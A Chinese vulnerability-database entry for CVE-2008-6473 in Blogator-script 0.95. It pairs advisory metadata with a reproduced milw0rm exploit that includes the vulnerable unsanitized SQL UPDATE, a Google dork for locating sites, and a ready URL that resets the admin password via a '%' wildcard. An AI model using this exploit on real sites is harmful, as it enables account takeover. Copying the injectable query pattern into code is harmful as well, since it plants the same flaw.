Blogator-script 'init_pass2.php' 用户密码变更漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114933 漏洞类型 信任管理
发布时间 2008-04-05 更新时间 2009-03-25
CVE编号 CVE-2008-6473 CNNVD-ID CNNVD-200903-269
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/5370
https://www.securityfocus.com/bid/28636
https://cxsecurity.com/issue/WLB-2009030178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-269
|漏洞详情
Blogator-script0.95版本的_blogadata/include/init_pass2.php允许远程攻击者可以借助一个修改过的在一个b参数中具有一个"%"的通配符标记的"a"参数,更改任意用户的密码。
|漏洞EXP
##############################################################################
             #                                                                            #
             #  ...:::::Blogator-script 0.95 Change User Password Vulnerbility ::::....   #           
             ##############################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----------------------------------
dork: inurl:/_blogadata/
-----------------------------------
vuln code in /_blogadata/include/init_pass2.php:
line 23: $id=$_GET['a'];
line 24:$email=$_GET['b'];
line 25: $mdp=$_GET['c'];
.....
line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1");

so if we put user id for $id and put %(any) for user email($email) and $mdp=newpassword.....he he he :)
------------
vuln:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%
example:(change admin pass to 123456)
http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=%

# milw0rm.com [2008-04-05]
|受影响的产品
Blogator-script Blogator-script 0.95
|参考资料

来源:BUGTRAQ
名称:20080405Blogator-script0.95ChangeUserPasswordVulnerbility
链接:http://www.securityfocus.com/archive/1/archive/1/490501/100/0/threaded
来源:MILW0RM
名称:5370
链接:http://www.milw0rm.com/exploits/5370
来源:OSVDB
名称:51227
链接:http://osvdb.org/51227